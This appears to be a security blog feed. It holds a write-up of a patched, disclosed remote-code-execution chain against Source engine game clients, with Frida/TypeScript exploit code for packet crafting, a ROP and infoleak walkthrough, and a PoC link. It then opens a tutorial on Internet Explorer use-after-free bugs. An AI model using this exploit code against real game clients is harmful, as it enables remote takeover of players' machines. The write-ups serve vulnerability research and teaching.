Heap exploits are cool to write, but often their stability can be difficult to achieve due to the vast number of heap allocations happening at any given time. This makes carving out areas of heap memory for your exploit require careful consideration for specifically sized holes of memory and the timing at which these holes are made. This process is lovingly referred to as Heap Feng Shui. In this post, I do not go over how to exploit heap vulnerabilities on the Source engine, but I will note that, due to its custom allocator, the allocations are much more predictable than the default Windows 10 heap, which is a nice benefit for those looking to do heap corruption.

Also, notice the word queryable above. This means that, whatever you corrupt for your information leak, you need to ensure that it can be queried over the network. Very few types of game objects can be queried arbitrarily. The best type of queryable object to work with in Source is the ConVar object, which represents a configurable console variable. Both the client and server can send requests to query the value of any ConVar object. The string that is sent back is the value of either the integer value of the CVar, or an arbitrary-length string value.

Bug Hunting - Struggling is fun!

This time around, I gave myself a few constraints to make the exploit process a bit more challenging, and therefore more fun:

  • The exploit must be memory corruption and must not be a trivial stack-based buffer overflow
  • The exploit must produce its own pointer leak, or chain another bug to infoleak
  • The exploit must work in all Source 1 games (TF2, CS:GO, L4D:2, etc.) and not require any special configuration of the client
  • The exploit must have a ~100% stability rate
  • The exploit must be written using Frida, and must be “one-click” automatically exploited on any client connected to the server

Given these constraints, I ruled out quite a few bugs. Most of these were because they were trivial stack-based buffer overflows, or present in only one game but not the other.

Here’s what I eventually settled on for my chain:

  • Memory Corruption - An array index under/overflow that allowed for one-shot arbitrary execute of an address in the low-level networking code
  • Information Leak - A stack-based information leak in file transfers that leveraged a “bug” in the ZIP file parser for the map file format (BSP)

I would say the general length of time to discover the memory corruption was about 1/10th of the time I spent finding the information leak. I spent around two months auditing code for information leaks, whereas the memory corruption bug became quickly obvious within a few days of auditing the networking code.

Memory Corruption - Arbitrary execute with CL_CopyExistingEntity

The vulnerability I used for memory corruption was the array index over/under-flow in the low-level networking function CL_CopyExistingEntity. This is a function called within the packet handler for the server->client packet named SVC_PacketEntities. In Source, the way data about changes to game objects is communicated is through the “delta” system. The server calculates what values have changed about an entity between two points in time and sends that information to your client in the form of a “delta”. This function is responsible for copying any changed variables of an existing game object from the network packet received from the server into the values stored on the client. I would consider this a very core part of the Source networking, which means that it exists across the board for all Source games. I have not verified it exists in older GoldSrc games, but I would not be surprised, considering this code and vulnerability are ancient and have existed for 15+ years untouched.

The function looks like so:

void CL_CopyExistingEntity( CEntityReadInfo &u )
{
    int start_bit = u.m_pBuf->GetNumBitsRead();

    IClientNetworkable *pEnt = entitylist->GetClientNetworkable( u.m_nNewEntity );
    if ( !pEnt )
    {
        Host_Error( "CL_CopyExistingEntity: missing client entity %d.\n", u.m_nNewEntity );
        return;
    }

    Assert( u.m_pFrom->transmit_entity.Get(u.m_nNewEntity) );

    // Read raw data from the network stream
    pEnt->PreDataUpdate( DATA_UPDATE_DATATABLE_CHANGED );

u.m_nNewEntity is controlled arbitrarily by the network packet, therefore this first argument to GetClientNetworkable can be an arbitrary 32-bit value. Now let’s look at GetClientNetworkable:

IClientNetworkable* CClientEntityList::GetClientNetworkable( int entnum )
{
	Assert( entnum >= 0 );
	Assert( entnum < MAX_EDICTS );
	return m_EntityCacheInfo[entnum].m_pNetworkable;
}

As we see here, these Assert statements would typically check to make sure that this value is sane, and crash the game if they weren’t. But, this is not what happens in practice. In release builds of the game, all Assert statements are not compiled into the game. This is for performance reasons, as the #1 goal of any game engine programmer is speed first, everything else second.

Anyway, these Assert statements do not prevent us from controlling entnum arbitrarily. m_EntityCacheInfo exists inside of a globally defined structure entitylist inside of client.dll. This object holds the client’s central store of all data related to game entities. This means that m_EntityCacheInfo since is at a static global offset, this allows us to calculate the proper values of entnum for our exploit easily by locating the offset of m_EntityCacheInfo in any given version of client.dll and calculating a proper value of entnum to create our target pointer.

Here is what an object inside of m_EntityCacheInfo looks like:

// Cached info for networked entities.
// NOTE: Changing this changes the interface between engine & client
struct EntityCacheInfo_t
{
	// Cached off because GetClientNetworkable is called a *lot*
	IClientNetworkable *m_pNetworkable;
	unsigned short m_BaseEntitiesIndex;	// Index into m_BaseEntities (or m_BaseEntities.InvalidIndex() if none).
	unsigned short m_bDormant;	// cached dormant state - this is only a bit
};

All together, this vulnerability allows us to return an arbitrary IClientNetworkable* from GetClientNetworkable as long as it is aligned to an 8 byte boundary (as sizeof(m_EntityCacheInfo) == 8). This is important for finding future exploit chaining.

Lastly, the result of returning an arbitrary IClientNetworkable* is that there is immediately this function call on our controlled pEnt pointer:

pEnt->PreDataUpdate( DATA_UPDATE_DATATABLE_CHANGED );

This is a virtual function call. This means that the generated code will offset into pEnt’s vtable and call a function. This looks like so in IDA:

image-20200507164606006

Notice call dword ptr [eax+24]. This implies that the vtable index is at 24 / 4 = 6, which is also important to know for future exploitation.

And that’s it, we have our first bug. This will allow us to control, within reason, the location of a fake object in the client to later craft into an arbitrary execute. But how are we going to create a fake object at a known location such that we can convince CL_CopyExistingEntity to call the address of our choice? Well, we can take advantage of the fact that the server can set any arbitrary value to a ConVar on a client, and most ConVar objects exist in globals defined inside of client.dll.

The definition of ConVar is:

class ConVar : public ConCommandBase, public IConVar

Where the general structure of a ConVar looks like:

ConCommandBase *m_pNext; [0x00]
bool m_bRegistered; [0x04]
const cha *m_pszName; [0x08]
const char *m_pszHelpString; [0x0C]
int m_nFlags; [0x10]
ConVar *m_pParent; [0x14]
const char *m_pszDefaultValue; [0x18]
char *m_pszString; [0x1C]

In this bug, we’re targeting m_pszString so that our crafted pointer lands directly on m_pszString. When the bug calls our function, it will believe that &m_pszString is the location of the object’s pointer, and m_pszString will contain its vtable pointer. The engine will now believe that any value inside of m_pszString for the ConVar will be part of the object’s structure. Then, it will call a function pointer at *((*m_pszString)+0x1C). As long as the ConVar on the client is marked as FCVAR_REPLICATED, the server can set its value arbitrarily, giving us full control over the contents of m_pszString. If we point the vtable pointer to the right place, this will give us control over the instruction pointer!

m_pszString is at offset 0x1C in the above ConVar structure, but the terms of our vulnerability requires that this pointer be aligned to an 8 byte boundary. Therefore, we need to find a suitable candidate ConVar that is both globally defined and replicated so that we can align m_pszString to correctly to return it to GetClientNetworkable.

This can be seen by what GetClientNetworkable looks like in x64dbg:

image-20200507170851575

In the above, the pointer we can return is controlled as such:

ecx+eax*8+28 where ecx is entitylist, eax is controlled by us

With a bit of searching, I found that the ConVar sv_mumble_positionalaudio exists in client.dll and is replicated. Here it exists at 0x10C6B788 in client.dll:

image-20200507173708203

This means to calculate the value of m_pszString, we add 0x1A to get 0x10C6B788 + 0x1C = 0x10C6b7A4. In this build, entitylist is at an aligned offset of 4 (0xC580B4). So, now we can calculate if this candidate is aligned properly:

>>> 0x10c6b7a4 % 0x8
4

This might look wrong, but entitylist is actually aligned to a 0x04 boundary, so that will add an extra 0x04 to the above alignment, making this value successfully align to 0x08!

Now we’re good to go ahead and use the m_pszString value of sv_mumble_positionalaudio to fake our object’s vtable pointer by using the server to control the string data contents through ConVar replication.

In summary, this is the path the code above will take:

  • Call GetClientNetworkable to get pEnt, which we will fake to point to &m_pszString.
  • The code dereferences the first value inside of m_pszString to get the pointer to the vtable
  • The code offsets the vtable to index 6 and calls the first function there. We need to make sure we point this to a place we control, otherwise we would only be controlling the vtable pointer and not the actual function address in the table.

But where are we going to point the vtable? Well, we don’t need much, just a location of a known place the server can control so we can write an address we want to execute. I did some searching and came across this:

bool NET_Tick::ReadFromBuffer( bf_read &buffer )
{
	VPROF( "NET_Tick::ReadFromBuffer" );

	m_nTick = buffer.ReadLong();
#if PROTOCOL_VERSION > 10
	m_flHostFrameTime = (float)buffer.ReadUBitLong( 16 ) / NET_TICK_SCALEUP;
	m_flHostFrameTimeStdDeviation = (float)buffer.ReadUBitLong( 16 ) / NET_TICK_SCALEUP;
#endif
	return !buffer.IsOverflowed();
}

As you might see, m_nTick is controlled by the contents of the NET_Tick packet directly. This means we can assign this to an arbitrary 32-bit value. It just so happens that this value is stored at a global as well! After some scripting up in Frida, I confirmed that this is indeed completely controllable by the NET_Tick packet from the server:

image-20200513141444074

The code to send this packet with my Frida bindings is quite simple too:

function SetClientTick(bf: bf_write, value: NativePointer) {
    bf.WriteUBitLong(net_Tick, NETMSG_BITS)

    // Tick count (Stored in m_ClientGlobalVariables->tickcount)
    bf.WriteLong(value.toInt32())

    // Write m_flHostFrameTime -> 1
    bf.WriteUBitLong(1, 16);

    // Write m_flHostFrameTimeStdDeviation -> 1
    bf.WriteUBitLong(1, 16);
}

Now we have a candidate location to point our vtable pointer. We just have to point it at &tickcount - 24 and the engine will believe that tickcount is the function that should be called in the vtable. After a bit of testing, here’s the resulting script which creates and sends the SVC_PacketEntities packet to the client to trigger the exploit:

// craft the netmessage for the PacketEntities exploit
function SendExploit_PacketEntities(bf: bf_write, offset: number) {
    bf.WriteUBitLong(svc_PacketEntities, NETMSG_BITS)

    // Max entries
    bf.WriteUBitLong(0, 11)

    // Is Delta?
    bf.WriteBit(0)

    // Baseline?
    bf.WriteBit(0)

    // # of updated entries?
    bf.WriteUBitLong(1, 11)

    // Length of update packet?
    bf.WriteUBitLong(55, 20)

    // Update baseline?
    bf.WriteBit(0)

    // Data_in after here
    bf.WriteUBitLong(3, 2) // our data_in is of type 32-bit integer

    // >>>>>>>>>>>>>>>>>>>> The out of bounds type confusion is here <<<<<<<<<<<<<<<<<<<<
    bf.WriteUBitLong(offset, 32)

    // enterpvs flag
    bf.WriteBit(0)

    // zero for the rest of the packet
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
}

Now we’ve got the following modified chain:

  • Call GetClientNetworkable to get pEnt, which we will fake to point to &m_pszString.
  • The code dereferences the first value inside of m_pszString to get the pointer to the vtable. We point this at &tickcount - 6*4 which we control.
  • The code offsets the vtable to index 6, dereferences, and calls the “function”, which will be the value we put in tickcount.

This generally looks like this in the exploit script:

// The fake object pointer and the ROP chain are stored in this cvar
ReplicateCVar(pkts_to_send, "sv_mumble_positionalaudio", tickCountAddress)

// Set a known location inside of engine.dll so we can use it to point our vtable value to
SetClientTick(pkts_to_send, new NativePointer(0x41414141))

// Then use exploit in PacketEntities to fake the object pointer to point to sv_mumble_positionalaudio's string value
SendExploit_PacketEntities(pkts_to_send, 0x26DA) 

0x26DA was calculated above to be the necessary entnum value to cause the out-of-bounds and align us to sv_mumble_positionalaudio->m_pszString.

Finally, we can see the results of our efforts:

image-20200513142919977

As we can see here, 0x41414141 is being popped off the stack at the ret, giving us a one-shot arbitrary execute! What you can’t see here is that, further down on the stack, our entire packet is sitting there unchanged, giving us ample room for a ROP chain.

Now, all we need is a pivot, which can be easily found using the Ropper project. After finding an appropriate pivot, we now can begin crafting a ROP chain… except we are missing something important. We don’t know where any gadgets are located in memory, including our stack pivot! Up until now, everything we’ve done is with relative offsets, but now we don’t even know where to point the value of 0x41414141 to on the client, because the layout of the code is randomized by ASLR. The easy way out would be to load up CS:GO and use xinput.dll addresses for our ROP chain… but that would violate my arbitrary constraint that this exploit must work for all Source games.

This means we need to go infoleak hunting.

Leaking uninitialized stack memory using a tricky ZIP file bug

After auditing the engine for many days over the course of a few months, I was finally able to engineer a series of tricks to chain together to cause the engine to leak uninitialized stack memory. This was all-in-all significantly harder than the memory corruption, and required a lot of out-of-the-box thinking to get it to work. This was my favorite part of the exploit. Here’s some background on how some of these systems work inside the engine and how they can be chained together:

  • Servers can cause the client to upload arbitrary files with certain file extensions
  • Map files can contain an embedded ZIP file which can package additional textures/files. This is called a “pakfile”.
  • When the map has a pakfile, the engine adds the zip file as sort of a “virtual overlay” on the regular filesystem the game uses to read/write files. This means that, in any file accesses the game makes, it will check the map’s pakfile to see if it can read it from there.

The interesting behavior I discovered about this system is that, if the server requests a file that is inside of the map’s pakfile, the client will upload that file from the embedded ZIP to the server. This wouldn’t make any sense in a normal case, but what it does is create a very unintended attack surface.

Now, let’s take a look at the function which is responsible for determining how large the file is that is going to be uploaded to the server, and if it is too large to be sent:

int totalBytes = g_pFileSystem->Size( filename, pPathID );

if ( totalBytes >= (net_maxfilesize.GetInt()*1024*1024) )
{
    ConMsg( "CreateFragmentsFromFile: '%s' size exceeds net_maxfilesize limit (%i MB).\n", filename, net_maxfilesize.GetInt() );
    return false;
}

So, what happens inside of g_pFileSystem->Size when you point it to a file inside the pakfile? Well, the code reads the ZIP file structure and locates the file, then reads the size directly from the ZIP header:

image-20200430014752750

Notice: lookup.m_nLength = zipFileHeader.uncompressedSize

Now we fully control the contents of the map file we gave to the client when they loaded in. Therefore, we control all the contents of the embedded pakfile inside the map. This means we control the full 32-bit value returned by g_pFileSystem->Size( filename, pPathID );.

So, maybe you have noticed where we’re going. int totalBytes is a signed integer, and the comparison for whether a file is too large is determined by a signed comparison. What happens when totalBytes is negative? That makes it fully pass the length check.

If we are able to hack a file into the ZIP structure with a negative length, the engine will now happily upload to the server.

Let’s look at the function responsible for reading the file to be uploaded to the server.

Inside of CNetChan::SendSubChannelData:

g_pFileSystem->Seek( data->file, offset, FILESYSTEM_SEEK_HEAD );
g_pFileSystem->Read( tmpbuf, length, data->file );
buf.WriteBytes( tmpbuf, length );

A stack buffer of size 0x100 is used to read contents of the file in 0x100 sized chunks as the file is sent to the server. It does so by calling g_pFileSystem->Read() on the file pointer and reading out the data to a temporary buffer on stack. The subchannel believes this file to be very large (as the subchannel interprets the size as an unsigned integer). The networking code will indefinitely send chunks to the server by allocating 0x100 of stack space and calling ->Read(). But, when the file pointer reaches the end of the pakfile, the calls to ->Read() stop writing out any data to the stack as there is no data left to read. Rather than failing out of this function, the return value of ->Read() is ignored and the data is sent Anyway. Because the stack’s contents are not cleared with each iteration, 0x100 bytes of uninitialized stack data are sent to the server constantly. The client’s subchannel will continue to send fragments indefinitely as the “file size” is too large to ever be sent successfully.

After quite a bit of learning about how the PKZIP file structure works, I was able to write up this Python script which can take an existing BSP and hack in a negatively sized file into the pakfile. Here’s the result:

image-20200506163703366

Now, we can test it by loading up Frida and crafting a packet to request the hacked file be uploaded to the server from the pakfile. Then, we can enable net_showfragments 1 in the game’s console to see all of the fragments that are being sent to us:

image-20200506171807825

This shows us that the client is sending many file fragments (num = 1 means file fragment). When left running, it will not stop re-leaking that stack memory to us, and will just continue to do so infinitely as long as the client is connected. This happens slowly over time, so the client’s game is unaffected.

I also placed a Frida Interceptor hook on the function responsible for reading the file’s size, and here we can see that it is indeed returning a negative number:

image-20200506164957309

Lastly, I hooked the function responsible for processing incoming file fragment packets on the server, and lo and behold, I have this blob of data being sent to us:

           0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F  0123456789ABCDEF
00000000  50 4b 05 06 00 00 00 00 06 00 06 00 f0 01 00 00  PK..............
00000010  86 62 00 00 20 00 58 5a 50 31 20 30 00 00 00 00  .b.. .XZP1 0....
00000020  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00000030  00 00 00 00 00 00 fa 58 13 00 00 58 13 00 00 26  .......X...X...&
00000040  00 00 00 00 00 00 00 00 00 00 00 00 00 19 3b 00  ..............;.
00000050  00 6d 61 74 65 72 69 61 f0 5e 65 62 30 2e b9 05  .materia.^eb0...
00000060  60 55 65 62 9c 76 71 00 ce 92 61 62 f0 5e 65 62  `Ueb.vq...ab.^eb
00000070  08 0b b9 05 b8 00 7c 6d 30 2e b9 05 b9 00 7c 6d  ......|m0.....|m
00000080  f0 5e 65 62 f0 5e 65 62 f0 89 61 62 f0 5e 65 62  .^eb.^eb..ab.^eb
00000090  44 00 00 00 60 55 65 62 60 55 65 62 00 00 00 00  D...`Ueb`Ueb....
000000a0  00 b5 4e 00 00 6d 61 74 65 72 69 61 6c 73 2f 6d  ..N..materials/m
000000b0  61 70 73 2f 63 70 5f 63 ec 76 71 00 00 02 00 00  aps/cp_c.vq.....
000000c0  0a a4 bc 7b 30 2e b9 05 f0 70 88 68 40 00 00 00  ...{[email protected]
000000d0  00 a5 db 09 01 00 00 00 c4 dc 75 00 16 00 00 00  ..........u.....
000000e0  00 00 00 00 98 77 71 00 00 00 00 00 00 00 00 00  .....wq.........
000000f0  30 77 71 00 cb 27 b3 7b 00 03 00 00 97 27 b3 7b  0wq..'.{.....'.{

You might not be able to tell, but this data is uninitialized. Specifically, there are pointer values that begin with 0x7B or 0x7C littered in here:

  • 97 27 b3 7b
  • 0a a4 bc 7b
  • 05 b9 00 7c
  • 05 b8 00 7c

The offsets of these pointer values in the 0x100 byte buffer are not always at the same place. Some heuristics definitely go a long way here. A simple mapping of DWORD values inside the buffer over time can show that some values quickly look like pointers and some do not. After a bit of tinkering with this leak, I was able to get it controlled to leak a known pointer value with ~100% certainty.

Here’s what the final output of the exploit looked like against a typical user:

[*] Intercepting ReadBytes (frag = 0)
0x0: 0x14b5041
0x4: 0x14001402
0x8: 0x0
0xc: 0x0
0x10: 0xd99e8b00
0x14: 0xffff00d3
0x18: 0xffff00ff
0x1c: 0x8ff
0x20: 0x0
0x24: 0x0
0x28: 0x18000
0x2c: 0x74000000
0x30: 0x2e747365
0x34: 0x50747874
0x38: 0x6054b
0x3c: 0x1000000
0x40: 0x36000100
0x44: 0x27000000
[...]
0xcc: 0xafdd68
0xd0: 0xa097d0c
0xd4: 0xa097d00
0xd8: 0xab780c
0xdc: 0x4
0xe0: 0xab7778
0xe4: 0x7ac9ab8d
0xe8: 0x0
0xec: 0x80
0xf0: 0xab7804
0xf4: 0xafdd68
0xf8: 0xab77d4
0xfc: 0x0
[*] leakedPointer: 0x7ac9ab8d
[*] Engine_Leak2 offset: 0x23ab8d
[*] leakedBase: 0x7aa60000

Only one of these values had a lower WORD offset that made sense (0xE4) therefore it was easily selectable from the list of DWORDS. After leaking this pointer, I traced it back in IDA to a return location for the upper stack frame of this function, which makes total sense. I gave it a label Engine_Leak2 in IDA, which could be loaded directly from my ret-sync connection to dynamically calculate the proper base address of the engine.dll module:

// calculate the engine base based on the RE'd address we know from the leak
static convertLeakToEngineBase(leakedPointer: NativePointer) {
    console.log("[*] leakedPointer: " + leakedPointer)

    // get the known offset of the leaked pointer in our engine.dll
    let knownOffset = se.util.require_offset("Engine_Leak2");
    console.log("[*] Engine_Leak2 offset: " + knownOffset)

    // use the offset to find the base of the client's engine.dll
    let leakedBase = leakedPointer.sub(knownOffset);
    console.log("[*] leakedBase: " + leakedBase)

    if ((leakedBase.toInt32() & 0xFFFF) !== 0) {
        console.log("[!] Failed leak...")
        return null;
    }

    console.log("[*] Got it!")
    return leakedBase;
}

The Final Chain + RCE!

After successfully developing the infoleak, now we have both a pointer leak and an arbitrary execute bug. These two are sufficient enough for us to craft a ROP chain and pop that sweet sweet calculator. The nice part about Frida being a Python module at its core is that you can use pyinstaller to turn any Frida script into an all-in-one executable. That way, all you have to do is copy the .exe onto a server, run your Source dedicated server, and launch the .exe to arm the server for exploitation.

Anyway, here is the full step-by-step detail of chaining the two bugs together:

  1. Player joins the exploitation server. This is picked up by the PoC script and it begins to exploit the client.

  2. Player downloads the map file from the server. The map file is specially prepared to install test.txt into the GAME filesystem path with the compromised length

  3. The server executes RequestFile to request the test.txt file from the pakfile. The client builds fragments for the new file and begins sending 0x100 sized fragments to the server, leaking stack contents. Inside the stack contents is a leaked stack frame return address from a previous call to bf_read::ReadBytes. By doing some calculations on the server, this achieves a full ASLR protection bypass on the client.

  4. The malicious server calculates the base of engine.dll on the client instance using the leaked pointer. This allows the server to now build a pointer value in the exploit payload to anywhere within engine.dll. Without this infoleak bug, the payload could not be built because the attacker does not know the location of any module due to ASLR.

  5. The server script builds a fake vtable pointer on the target client instance by replicating a ConVar onto the client. This is used to build a fake vtable on the client with a pointer to the fake vtable in a known location (the global ConVar). The PoC replicates the fake vtable onto sv_mumble_positionalaudio which is a replicated ConVar inside of client.dll. The location of the contents of this replicated ConVar can be calculated from sv_mumble_positionalaudio->m_pszString and is used for later exploitation steps.

  6. The server builds a ROP chain payload to execute the Windows API call for ShellExecuteA. This ROP chain is used to bypass the NX protection on modern Windows systems. The chain utilizes the known addresses in engine.dll that were leaked from the exploitation of the separate bug in Step 3. Upon successful exploitation, this ROP chain can execute arbitrary code.

  7. The script again replicates the ConVar sv_downloadurl onto the client instance with the value of C:/Windows/System32/winver.exe. This is used by the ROP chain as the target program to execute with ShellExecuteA. This ConVar exists inside of engine.dll so the pointer sv_download_url->m_pszString is now at an attacker known location.

  8. The server sends a crafted NET_Tick message to modify the value of g_ClientGlobalVariables->tickcount to be a pointer to a stack pivot gadget found inside of engine.dll (again, leaked from Step 3). Essentially, this is another trick to get a pointer value to exist at an attacker controlled location within engine.dll.

  9. Now, the next bug will be used by creating a specially crafted SVC_PacketEntities netmessage which will call CL_CopyExistingEntity on the client instance with the vulnerable value for m_nNewEntity. This value will exploit the array overrun in GetClientNetworkable inside of client.dll and allows us to confuse the pointer return value to instead be a pointer to sv_mumble_positionalaudio->m_pszString (also inside client.dll). At the location of sv_mumble_positionalaudio->m_pszString is the fake object pointer created in Step 4. This object pointer will redirect execution by pretending to be an IClientNetworkable* object and redirect the virtual method call to the value found within g_ClientGlobalVariables->tickcount. This means we can set the instruction pointer to any value specified by the NET_Tick trick we used in Step 7.

  10. Lastly, to execute the ROP chain and achieve RCE, the g_ClientGlobalVariables->tickcount is pointed to a stack pivot gadget inside of engine.dll. This pivots the stack to the ROP payload that was placed in sv_mumble_positionalaudio->m_pszString in Step 4. The ROP chain then begins execution. The chain will load necessary arguments to call ShellExecuteA, then execute whatever program path we replicated onto sv_downloadurl given in Step 6. In this case, it is used to execute winver.exe for proof of concept. This chain can execute any code of the attacker’s choosing, and has full permissions to access all of the users files and data.

And there you have it. This entire exploitation happens automatically, and does so by using Frida to inject into the dedicated server process to instrument to do all of the steps above. This is quite involved, but the result is pretty awesome! Here’s a video of the full PoC in action, be sure to full screen it so it’s easier to see:

Disclosure Timeline

  • [2020-05-13] Reported to Valve through HackerOne
  • [2020-05-18] Bug triaged
  • [2021-04-28] Notification that the bugs were fixed in Beta
  • [2021-04-30] Bounty paid ($7500) and notification that the bugs were fixed in Retail

Supporting Files

Exploit PoC and the map hacking Python script referenced in this post are available in full at:

https://github.com/Gbps/sourceengine-packetentities-rce-poc

For the Frida exploit chain: https://github.com/Gbps/sourceengine-packetentities-rce-poc/tree/master/src/agent

But sure to give it a ⭐ if you liked it!

Final thoughts

This chain was super fun to develop, and the constraints I placed on myself made the exploit way more interesting than my first submission. I’m glad that the report finally went through so I could publish the information for everyone to read. It really goes to show that even a fairly simple set of bugs on paper can turn into a complex exploitation effort quickly when targeting big software applications. But, doing so helps you develop skills that you might not necessarily pick up from simple CTF problems.

Incorporating the Frida project definitely reinvigorated my drive to continue poking and testing PoCs for bugs, as the process for scripting up examples was much nicer than before. I hope to spend some time in a future post to discuss more ways to utilize Frida on the desktop, and also hope to publish my ret-sync Frida plugin in an official capacity on my GitHub soon.

I’m also working on some other projects in the meantime, off-and-on. I have also been writing a fairly large project which implements a CS:GO client from scratch in Rust to help improve my skills with the language. After a ton of work, I can happily say my client can authenticate with Steam, fully connect and load into a server, send and receive netchannel packets with the game server, and host a fake console to execute concommands. There is no graphical portion of this, it is entirely command line based.

In addition, I’ve started to shift my focus somewhat away from Source and onto Steam itself. Steam is a vastly complex application, and its networking protocol it uses is magnitudes more complex than that of Source. There hasn’t been too much research done in the public on Steam’s networking protocols, so I’ve written a few tools that can fully encode/decode this networking layer and intercept packets to learn how they work. Even an idle instance of Steam running creates a lot of very interesting traffic that very few people have looked at! More information on this hopefully soon.

For now, I don’t have a timeline for the release of any of those projects, or for the next blog post I will write, but hopefully it won’t be as long as it took to get this one out ;)

Thank you for reading!

☑ ★ ✇ Connor McGarr

Exploit Development: Browser Exploitation on Windows - Understanding Use-After-Free Vulnerabilities

By: Connor McGarr

Introduction

Browser exploitation is a topic that has been incredibly daunting for myself. Looking back at my journey over the past year and a half or so since I started to dive into binary exploitation, specifically on Windows, I remember experiencing this same feeling with kernel exploitation. I can still remember one day just waking up and realizing that I just need to just dive into it if I ever wanted to advance my knowledge. Looking back, although I still have tons to learn about it and am still a novice at kernel exploitation, I realized it was my will to just jump in, irrespective of the difficulty level, that helped me to eventually grasp some of the concepts surrounding more modern kernel exploitation.

Browser exploitation has always been another fear of mine, even more so than the Windows kernel, due to the fact not only do you need to understand overarching exploit primitives and vulnerability classes that are specific to Windows, but also needing to understand other topics such as the different JavaScript engines, just-in-time (JIT) compilers, and a plethora of other subjects, which by themselves are difficult (at least to me) to understand. Plus, the addition of browser specific mitigations is also something that has been a determining factor in myself putting off learning this subject.

What has always been frightening, is the lack (in my estimation) of resources surrounding browser exploitation on Windows. Many people can just dissect a piece of code and come up with a working exploit within a few hours. This is not the case for myself. The way I learn is to take a POC, along with an accompanying blog, and walk through the code in a debugger. From there I analyze everything that is going on and try to ask myself the question “Why did the author feel it was important to mention X concept or show Y snippet of code?”, and to also attempt to answer that question. In addition to that, I try to first arm myself with the prerequisite knowledge to even begin the exploitation process (e.g. “The author mentioned this is a result of a fake virtual function table. What is a virtual function table in the first place?”). This helps me to understand the underlying concepts. From there, I am able to take other POCs that leverage the same vulnerability classes and weaponize them - but it takes that first initial walkthrough for myself.

Since this is my learning style, I have found that blogs on Windows browser exploitation which start from the beginning are very sparse. Since I use blogging as a mechanism not only to share what I know, but to reinforce the concepts I am attempting to hit home, I thought I would take a few months, now with Advanced Windows Exploitation (AWE) being canceled again for 2021, to research browser exploitation on Windows and to talk about it.

Please note that what is going to be demonstrated here, is not heap spraying as an execution method. These will be actual vulnerabilities that are exploited. However, it should also be noted that this will start out on Internet Explorer 8, on Windows 7 x86. We will still outline leveraging code-reuse techniques to bypass DEP, but don’t expect MemGC, Delay Free, etc. to be enabled for this tutorial, and most likely for the next few. This will simply be a documentation of my thought process, should you care, of how I went from crash to vulnerability identification, and hopefully to a shell in the end.

Understanding Use-After-Free Vulnerabilities

As was aforesaid above, the vulnerability we will be taking a look at is a use-after-free. More specifically, MS13-055, which is titled as Microsoft Internet Explorer CAnchorElement Use-After-Free. What exactly does this mean? Use-after-free vulnerabilities are well documented, and fairly common. There are great explanations out there, but for brevity and completeness sake I will take a swing at explaining them. Essentially what happens is this - a chunk of memory (chunks are just contiguous pieces of memory, like a buffer. Each piece of memory, known as a block, on x86 systems are 0x8 bytes, or 2 DWORDS. Don’t over-think them) is allocated by the heap manager (on Windows there is the front-end allocator, known as the Low-Fragmentation Heap, and the standard back-end allocator. We will talk about these in the a future section). At some point during the program’s lifetime, this chunk of memory, which was previously allocated, is “freed”, meaning the allocation is cleaned up and can be re-used by the heap manager again to service allocation requests.

Let’s say the allocation was at the memory address 0x15000. Let’s say the chunk, when it was allocated, contained 0x40 bytes of 0x41 characters. If we dereferenced the address 0x15000, you could expect to see 0x41s (this is psuedo-speak and should just be taken at a high level for now). When this allocation is freed, if you go back and dereference the address again, you could expect to see invalid memory (e.g. something like ???? in WinDbg), if the address hasn’t been used to service any allocation requests, and is still in a free state.

Where the vulnerability comes in is the chunk, which was allocated but is now freed, is still referenced/leveraged by the program, although in a “free” state. This usually causes a crash, as the program is attempting to either access and/or dereference memory that simply isn’t valid anymore. This usually causes some sort of exception, resulting in a program crash.

Now that the definition of what we are attempting to take advantage of is out of the way, let’s talk about how this condition arises in our specific case.

C++ Classes, Constructors, Destructors, and Virtual Functions

You may or may not know that browsers, although they interpret/execute JavaScript, are actually written in C++. Due to this, they adhere to C++ nomenclature, such as implementation of classes, virtual functions, etc. Let’s start with the basics and talk about some foundational C++ concepts.

A class in C++ is very similar to a typical struct you may see in C. The difference is, however, in classes you can define a stricter scope as to where the members of the class can be accessed, with keywords such as private or public. By default, members of classes are private, meaning the members can only be accessed by the class and by inherited classes. We will talk about these concepts in a second. Let’s give a quick code example.

#include <iostream>
using namespace std;

// This is the main class (base class)
class classOne
{
  public:

    // This is our user defined constructor
    classOne()
    {
      cout << "Hello from the classOne constructor" << endl;
    }

    // This is our user defined destructor
    ~classOne()
    {
      cout << "Hello from the classOne destructor!" << endl;
    }

  public:
    virtual void sharedFunction(){};        // Prototype a virtual function
    virtual void sharedFunction1(){};       // Prototype a virtual function
};

// This is a derived/sub class
class classTwo : public classOne
{
  public:

    // This is our user defined constructor
    classTwo()
    {
      cout << "Hello from the classTwo constructor!" << endl;
    };

    // This is our user defined destructor
    ~classTwo()
    {
      cout << "Hello from the classTwo destructor!" << endl;
    };

  public:
    void sharedFunction()               
    {
      cout << "Hello from the classTwo sharedFunction()!" << endl;    // Create A DIFFERENT function definition of sharedFunction()
    };

    void sharedFunction1()
    {
      cout << "Hello from the classTwo sharedFunction1()!" << endl;   // Create A DIFFERENT function definition of sharedFunction1()
    };
};

// This is another derived/sub class
class classThree : public classOne
{
  public:

    // This is our user defined constructor
    classThree()
    {
      cout << "Hello from the classThree constructor" << endl;
    };

    // This is our user defined destructor
    ~classThree()
    {
      cout << "Hello from the classThree destructor!" << endl;
    };
  
  public:
    void sharedFunction()
    {
      cout << "Hello from the classThree sharedFunction()!" << endl;  // Create A DIFFERENT definition of sharedFunction()
    };

    void sharedFunction1()
    {
      cout << "Hello from the classThree sharedFunction1()!" << endl;   // Create A DIFFERENT definition of sharedFunction1()
    };
};

// Main function
int main()
{
  // Create an instance of the base/main class and set it to one of the derivative classes
  // Since classTwo and classThree are sub classes, they inherit everything classOne prototypes/defines, so it is acceptable to set the address of a classOne object to a classTwo object
  // The class 1 constructor will get called twice (for each classOne object created), and the classTwo + classThree constructors are called once each (total of 4)
  classOne* c1 = new classTwo;
  classOne* c1_2 = new classThree;

  // Invoke the virtual functions
  c1->sharedFunction();
  c1_2->sharedFunction();
  c1->sharedFunction1();
  c1_2->sharedFunction1();

  // Destructors are called when the object is explicitly destroyed with delete
  delete c1;
  delete c1_2;
}
